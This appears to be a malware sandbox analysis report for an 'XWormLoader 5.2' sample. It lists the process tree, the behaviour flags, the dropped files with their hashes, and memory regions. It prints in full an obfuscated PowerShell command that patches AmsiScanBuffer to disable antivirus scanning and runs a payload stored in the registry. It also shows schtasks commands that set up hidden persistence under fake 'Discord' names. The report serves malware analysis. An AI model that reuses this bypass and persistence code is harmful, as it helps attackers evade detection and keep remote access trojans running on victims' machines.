- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4708 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:zLKekkAcQBKz{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$adVrVglFxMCVww,[Parameter(Position=1)][Type]$CtHTcHsiCi)$mKEKnOLTYId=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+'f'+'l'+''+[Char](101)+'ct'+'e'+''+[Char](100)+''+[Char](68)+''+'e'+'leg'+'a'+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+''+[Char](101)+'m'+[Char](111)+''+[Char](114)+''+'y'+'Mo'+'d'+''+'u'+''+[Char](108)+'e',$False).DefineType(''+'M'+'y'+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+''+'e'+''+[Char](84)+''+[Char](121)+'p'+[Char](101)+'','Cl'+[Char](97)+'ss'+[Char](44)+''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+'S'+'ea'+'l'+''+'e'+''+[Char](100)+','+[Char](65)+''+'n'+''+'s'+''+[Char](105)+'C'+'l'+''+'a'+''+'s'+''+[Char](115)+''+','+''+[Char](65)+''+'u'+'t'+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+'s'+'',[MulticastDelegate]);$mKEKnOLTYId.DefineConstructor('R'+[Char](84)+''+[Char](83)+''+'p'+''+[Char](101)+''+[Char](99)+''+'i'+''+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+''+'m'+''+[Char](101)+','+[Char](72)+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+''+'y'+''+[Char](83)+'i'+'g'+''+[Char](44)+'Pu'+[Char](98)+'l'+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$adVrVglFxMCVww).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+'an'+'a'+''+'g'+''+[Char](101)+''+'d'+'');$mKEKnOLTYId.DefineMethod('I'+[Char](110)+'v'+[Char](111)+''+'k'+''+[Char](101)+'',''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+''+'i'+''+[Char](99)+''+','+''+[Char](72)+'id'+[Char](101)+'B'+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+'w'+'S'+''+[Char](108)+''+[Char](111)+'t'+[Char](44)+''+'V'+'i'+'r'+''+'t'+''+[Char](117)+''+'a'+'l',$CtHTcHsiCi,$adVrVglFxMCVww).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $mKEKnOLTYId.CreateType();}$fynOAwzELRnoL=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'s'+[Char](116)+''+[Char](101)+''+[Char](109)+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType('M'+[Char](105)+'c'+'r'+'o'+[Char](115)+'o'+[Char](102)+''+[Char](116)+'.'+[Char](87)+'in'+[Char](51)+''+'2'+''+[Char](46)+'U'+'n'+'s'+'a'+''+'f'+'e'+'N'+''+[Char](97)+'t'+'i'+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+'h'+'o'+'ds');$VxwzBYUPewFweM=$fynOAwzELRnoL.GetMethod('Ge'+[Char](116)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+'c'+''+'A'+''+'d'+''+'d'+''+'r'+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags]('P'+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+','+[Char](83)+'t'+[Char](97)+'t'+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$RyLKsmYFYSXDFayTtes=zLKekkAcQBKz @([String])([IntPtr]);$tMopxRaipjETbivjIIuyRH=zLKekkAcQBKz @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$OdojkyFPqPj=$fynOAwzELRnoL.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](77)+''+'o'+'d'+[Char](117)+'l'+[Char](101)+''+[Char](72)+''+'a'+''+[Char](110)+''+[Char](100)+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object]('ker'+[Char](110)+''+[Char](101)+''+'l'+''+[Char](51)+''+[Char](50)+'.'+'d'+'l'+'l'+'')));$vmvYdigRORuqkT=$VxwzBYUPewFweM.Invoke($Null,@([Object]$OdojkyFPqPj,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+'d'+'L'+[Char](105)+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+'r'+''+'y'+'A')));$cKyJXOTKjnyXeoWQI=$VxwzBYUPewFweM.Invoke($Null,@([Object]$OdojkyFPqPj,[Object]('V'+'i'+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+''+'l'+''+[Char](80)+''+[Char](114)+''+[Char](111)+'t'+[Char](101)+''+[Char](99)+''+'t'+'')));$wIyPKrh=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vmvYdigRORuqkT,$RyLKsmYFYSXDFayTtes).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+''+[Char](105)+'.'+[Char](100)+''+[Char](108)+''+'l'+'');$YwxJjCNbuZgkOdBmU=$VxwzBYUPewFweM.Invoke($Null,@([Object]$wIyPKrh,[Object]('A'+[Char](109)+''+[Char](115)+'iS'+[Char](99)+'an'+[Char](66)+''+[Char](117)+'ffe'+[Char](114)+'')));$PBVqkxGJUr=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($cKyJXOTKjnyXeoWQI,$tMopxRaipjETbivjIIuyRH).Invoke($YwxJjCNbuZgkOdBmU,[uint32]8,4,[ref]$PBVqkxGJUr);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$YwxJjCNbuZgkOdBmU,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($cKyJXOTKjnyXeoWQI,$tMopxRaipjETbivjIIuyRH).Invoke($YwxJjCNbuZgkOdBmU,[uint32]8,0x20,[ref]$PBVqkxGJUr);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+'F'+''+[Char](84)+'W'+'A'+''+'R'+''+[Char](69)+'').GetValue(''+'$'+'7'+[Char](55)+''+[Char](115)+''+[Char](116)+''+'a'+''+'g'+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1456 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5088
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵PID:1184
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s nsi1⤵PID:1216
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s EventSystem1⤵PID:1236
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵PID:1252
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp1⤵PID:1396
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵PID:1428
-
c:\windows\system32\sihost.exesihost.exe2⤵PID:2580
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵PID:1472
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s NlaSvc1⤵PID:1540
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder1⤵PID:1580
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s Dnscache1⤵PID:1600
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵PID:1680
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s netprofm1⤵PID:1720
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵PID:1756
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted1⤵PID:1772
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s StateRepository1⤵PID:1848
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵PID:1856
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1940
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation1⤵PID:1992
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵PID:2144
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc1⤵PID:2236
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2472
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵PID:2492
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent1⤵PID:2588
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc1⤵PID:2660
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵PID:2700
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s CryptSvc1⤵PID:2732
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2744
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks1⤵PID:2772
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵PID:2788
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3024
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s TokenBroker1⤵PID:2960
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:3396 -
C:\Users\Admin\AppData\Local\Temp\XWormLoader 5.2 x64.exe"C:\Users\Admin\AppData\Local\Temp\XWormLoader 5.2 x64.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2452 -
C:\Users\Admin\AppData\Local\Temp\svchost.exe"C:\Users\Admin\AppData\Local\Temp\svchost.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4644 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\svchost.exe" /rl HIGHEST /f4⤵
- Creates scheduled task(s)
PID:4668 -
C:\Users\Admin\AppData\Roaming\Discord\Discord.exe"C:\Users\Admin\AppData\Roaming\Discord\Discord.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1224 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Discord\Discord.exe" /rl HIGHEST /f5⤵
- Creates scheduled task(s)
PID:1688 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /delete /tn "Discord" /f5⤵PID:4600
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:3148
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\0jSt7BAPWqCT.bat" "5⤵PID:4188
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:1828
-
C:\Windows\SysWOW64\chcp.comchcp 650016⤵PID:4708
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost6⤵
- Runs ping.exe
PID:3088 -
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"5⤵
- Executes dropped EXE
PID:4316 -
C:\Windows\SysWOW64\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77Discord.exe" /tr "'C:\Users\Admin\AppData\Roaming\Discord\Discord.exe'" /sc onlogon /rl HIGHEST5⤵
- Creates scheduled task(s)
PID:4320 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:4636
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"4⤵
- Executes dropped EXE
PID:2120 -
C:\Windows\SysWOW64\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77svchost.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\svchost.exe'" /sc onlogon /rl HIGHEST4⤵
- Creates scheduled task(s)
PID:4928 -
C:\Users\Admin\AppData\Local\Temp\XWormLoader 5.2 x32.exe"C:\Users\Admin\AppData\Local\Temp\XWormLoader 5.2 x32.exe"3⤵
- Executes dropped EXE
PID:4908 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:2464
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 8444⤵
- Program crash
PID:4224
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3976
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:1520
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s CDPSvc1⤵PID:4700
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵PID:3712
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc1⤵PID:1832
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:876
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s wlidsvc1⤵PID:2684
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:2896
-
C:\Windows\system32\ApplicationFrameHost.exeC:\Windows\system32\ApplicationFrameHost.exe -Embedding1⤵PID:5008
-
C:\Windows\System32\InstallAgent.exeC:\Windows\System32\InstallAgent.exe -Embedding1⤵PID:4988
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵PID:4420
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵PID:4864
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:3524
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\0jSt7BAPWqCT.batFilesize
264B
MD57e4ac358e29bcd3664557eeb094b754f
SHA18a6cd618a423564073722d4e8dac82eadb94e3a9
SHA256e24fad0f0c507480565e6a74a5c3f346c1b6e797a05f2e50f2fcc372ea6184bc
SHA51247cb73573924ff5282104ad7eff1cc3ed43182e242b73eef7a5d43f4c77221819ddd30f7984505780f3fda953db95f6eaf9eb7013969f66e63eaaea43e95190e
-
C:\Users\Admin\AppData\Local\Temp\XWormLoader 5.2 x32.exeFilesize
109KB
MD5f3b2ec58b71ba6793adcc2729e2140b1
SHA1d9e93a33ac617afe326421df4f05882a61e0a4f2
SHA2562d74eb709aea89a181cf8dfcc7e551978889f0d875401a2f1140487407bf18ae
SHA512473edcaba9cb8044e28e30fc502a08a648359b3ed0deba85e559fe76b484fc8db0fc2375f746851623e30be33da035cec1d6038e1fcf4842a2afb6f9cd397495
-
C:\Users\Admin\AppData\Local\Temp\install.exeFilesize
162KB
MD5152e3f07bbaf88fb8b097ba05a60df6e
SHA1c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA5122fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
-
C:\Users\Admin\AppData\Local\Temp\svchost.exeFilesize
409KB
MD561e7a9eaef04c1617ffff35c0287d234
SHA15a6ffedd75ac4e07594ccb6974ee8684d5128a35
SHA256b2b4be7ae20431c88115d561a6886f22ab3416595338e7e2eb361f0bb428b987
SHA5128ee9fd8d8631dd611ff539fc35ad4c26f7bfb4b8a26de12e03f48f3b87a7f18198c37ec187a1e8393aafb88e468e74c734cafcaf72f73b0afc55822762d767e6
-
C:\Windows\Temp\__PSScriptPolicyTest_qee5nvqs.kb1.ps1Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.logFilesize
3KB
MD556efdb5a0f10b5eece165de4f8c9d799
SHA1fa5de7ca343b018c3bfeab692545eb544c244e16
SHA2566c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108
SHA51291e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5d61d7f65117823a52913b840feed43c6
SHA1e2580207e1611dcb229ee9d2b4bb0bd4dbcc884f
SHA256d0d50cb4ab1fe4b5dcb9c081d49b33381336fc0ebc7629702ed94d47f7032a86
SHA512e4cf12f3642ce8746f39bcfaa6265d105919d1cbe863119f4413aa4c5d307d7d69f0638bd0434d47f651e183ec209f02dd7d44954c790ef4d585155817ed8a3c
-
memory/584-87-0x00007FF9B4FC0000-0x00007FF9B4FD0000-memory.dmpFilesize
64KB
-
memory/584-86-0x000001BA9DC30000-0x000001BA9DC5B000-memory.dmpFilesize
172KB
-
memory/584-81-0x000001BA9DC30000-0x000001BA9DC5B000-memory.dmpFilesize
172KB
-
memory/584-79-0x000001BA9DC30000-0x000001BA9DC5B000-memory.dmpFilesize
172KB
-
memory/584-78-0x000001BA9DC00000-0x000001BA9DC25000-memory.dmpFilesize
148KB
-
memory/640-98-0x00007FF9B4FC0000-0x00007FF9B4FD0000-memory.dmpFilesize
64KB
-
memory/640-91-0x000002952BB00000-0x000002952BB2B000-memory.dmpFilesize
172KB
-
memory/640-97-0x000002952BB00000-0x000002952BB2B000-memory.dmpFilesize
172KB
-
memory/740-109-0x00007FF9B4FC0000-0x00007FF9B4FD0000-memory.dmpFilesize
64KB
-
memory/740-102-0x00000226AC250000-0x00000226AC27B000-memory.dmpFilesize
172KB
-
memory/740-108-0x00000226AC250000-0x00000226AC27B000-memory.dmpFilesize
172KB
-
memory/904-113-0x000001ED4B010000-0x000001ED4B03B000-memory.dmpFilesize
172KB
-
memory/904-120-0x00007FF9B4FC0000-0x00007FF9B4FD0000-memory.dmpFilesize
64KB
-
memory/904-119-0x000001ED4B010000-0x000001ED4B03B000-memory.dmpFilesize
172KB
-
memory/992-124-0x0000017BDDC80000-0x0000017BDDCAB000-memory.dmpFilesize
172KB
-
memory/1224-57-0x0000000006490000-0x000000000649A000-memory.dmpFilesize
40KB
-
memory/2452-13-0x00007FF9D8440000-0x00007FF9D8E2C000-memory.dmpFilesize
9.9MB
-
memory/2452-10-0x00007FF9D8440000-0x00007FF9D8E2C000-memory.dmpFilesize
9.9MB
-
memory/2452-1-0x0000000000550000-0x00000000005A8000-memory.dmpFilesize
352KB
-
memory/2452-0-0x00007FF9D8443000-0x00007FF9D8444000-memory.dmpFilesize
4KB
-
memory/4472-66-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4472-75-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4472-72-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4472-74-0x00007FF9F4AE0000-0x00007FF9F4B8E000-memory.dmpFilesize
696KB
-
memory/4472-73-0x00007FF9F4F30000-0x00007FF9F510B000-memory.dmpFilesize
1.9MB
-
memory/4472-65-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4472-67-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4472-64-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4644-19-0x0000000005E00000-0x00000000062FE000-memory.dmpFilesize
5.0MB
-
memory/4644-21-0x00000000734B0000-0x0000000073B9E000-memory.dmpFilesize
6.9MB
-
memory/4644-14-0x00000000734BE000-0x00000000734BF000-memory.dmpFilesize
4KB
-
memory/4644-17-0x00000000008F0000-0x000000000095C000-memory.dmpFilesize
432KB
-
memory/4644-20-0x0000000005730000-0x00000000057C2000-memory.dmpFilesize
584KB
-
memory/4644-35-0x00000000734B0000-0x0000000073B9E000-memory.dmpFilesize
6.9MB
-
memory/4644-24-0x0000000006970000-0x00000000069AE000-memory.dmpFilesize
248KB
-
memory/4644-23-0x00000000056F0000-0x0000000005702000-memory.dmpFilesize
72KB
-
memory/4644-22-0x0000000005640000-0x00000000056A6000-memory.dmpFilesize
408KB
-
memory/4708-61-0x0000029A68C60000-0x0000029A68C8A000-memory.dmpFilesize
168KB
-
memory/4708-40-0x0000029A68BD0000-0x0000029A68BF2000-memory.dmpFilesize
136KB
-
memory/4708-63-0x00007FF9F4AE0000-0x00007FF9F4B8E000-memory.dmpFilesize
696KB
-
memory/4708-43-0x0000029A68DA0000-0x0000029A68E16000-memory.dmpFilesize
472KB
-
memory/4708-62-0x00007FF9F4F30000-0x00007FF9F510B000-memory.dmpFilesize
1.9MB
-
memory/4908-18-0x00000000734B0000-0x0000000073B9E000-memory.dmpFilesize
6.9MB
-
memory/4908-750-0x00000000734B0000-0x0000000073B9E000-memory.dmpFilesize
6.9MB
-
memory/4908-16-0x00000000010C0000-0x00000000010E0000-memory.dmpFilesize
128KB